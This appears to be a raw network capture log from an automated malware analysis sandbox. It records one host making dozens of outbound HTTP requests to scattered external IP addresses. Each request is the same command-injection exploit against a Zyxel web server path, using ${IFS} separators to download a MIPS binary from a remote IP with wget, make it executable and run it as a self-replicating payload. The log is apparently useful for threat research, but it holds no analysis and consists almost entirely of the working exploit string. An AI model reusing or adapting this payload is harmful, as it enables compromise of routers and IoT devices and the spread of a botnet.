                                                Jan 28, 2024 10:16:16.680589914 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2235192.168.2.2353022138.42.175.68443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.680625916 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2236192.168.2.2354032217.100.34.196443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.680633068 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2237192.168.2.2339192143.69.127.153443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.680671930 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2238192.168.2.233957267.74.92.72443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.680701017 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2239192.168.2.235361050.206.211.143443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.680728912 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2240192.168.2.233417685.129.167.226443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.680756092 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2241192.168.2.234105027.124.48.242443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.680783987 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2242192.168.2.233477419.243.198.198443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.680802107 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2243192.168.2.2351912115.106.209.248443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.680830956 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2244192.168.2.235976631.176.222.243443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.680836916 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2245192.168.2.2358006134.86.6.125443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.680888891 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2246192.168.2.2355504158.4.193.104443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.680915117 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2247192.168.2.236054440.36.114.137443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.680952072 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2248192.168.2.233701663.179.104.51443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.680990934 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2249192.168.2.235957287.137.151.215443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.681001902 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2250192.168.2.233785478.76.190.235443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.681030989 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2251192.168.2.2337710170.110.24.199443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.681062937 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2252192.168.2.2358988210.209.239.237443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.681093931 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2253192.168.2.2348520205.91.208.83443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.681127071 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2254192.168.2.235148848.188.44.57443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.681154966 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2255192.168.2.234805024.124.211.141443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.681186914 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2256192.168.2.2346526166.242.234.251443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.681216955 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2257192.168.2.2344024107.59.74.202443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.681246996 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2258192.168.2.2359480124.164.4.248443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.681266069 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2259192.168.2.2355638101.169.46.112443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.681293011 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2260192.168.2.2356480108.120.41.76443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.681309938 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2261192.168.2.2354196146.72.126.241443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.681338072 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2262192.168.2.2349862188.238.40.14443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.681368113 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2263192.168.2.2332808157.150.103.176443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.681405067 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2264192.168.2.235057048.212.223.156443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.681437969 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2265192.168.2.2344860130.89.224.125443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.681457996 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2266192.168.2.2351214136.214.1.151443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.681490898 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2267192.168.2.23577204.2.106.115443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.681499004 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2268192.168.2.233498641.4.17.149443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.681552887 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2269192.168.2.23346385.105.12.187443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.681579113 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2270192.168.2.234969024.77.249.126443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.681598902 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2271192.168.2.234412265.94.21.183443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.681623936 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2272192.168.2.234084277.150.147.141443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.681659937 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2273192.168.2.2345460184.234.106.233443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.681679010 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2274192.168.2.235918461.21.244.228443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.681691885 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2275192.168.2.2339324161.202.24.204443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.681735992 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2276192.168.2.2353130132.198.202.165443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.681751966 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2277192.168.2.234071079.170.93.181443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.681766987 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2278192.168.2.2345536216.105.69.70443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.681816101 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2279192.168.2.2341476136.233.60.195443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.681843996 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2280192.168.2.2360956191.15.172.51443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.681879997 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2281192.168.2.2359594193.83.29.116443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.681896925 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2282192.168.2.2346376216.6.236.85443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.681911945 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2283192.168.2.2340474156.26.0.134443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.681924105 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2284192.168.2.2334572108.18.183.234443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.681965113 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2285192.168.2.235736879.228.231.92443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.681973934 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2286192.168.2.236078690.134.245.53443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.681987047 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2287192.168.2.233569491.171.100.55443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.682018995 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2288192.168.2.235914019.141.127.134443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.682034016 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2289192.168.2.2345560130.2.85.145443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.682065010 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2290192.168.2.2348204117.86.252.1443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.682095051 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2291192.168.2.234603441.131.75.5443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.682101011 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2292192.168.2.234809438.188.138.246443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.682130098 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2293192.168.2.2337976174.73.170.211443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.682161093 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2294192.168.2.234981696.143.216.212443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.682183981 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2295192.168.2.2348302185.95.70.215443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.682193995 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2296192.168.2.234462462.6.197.232443
                                                TimestampBytes transferredDirectionData
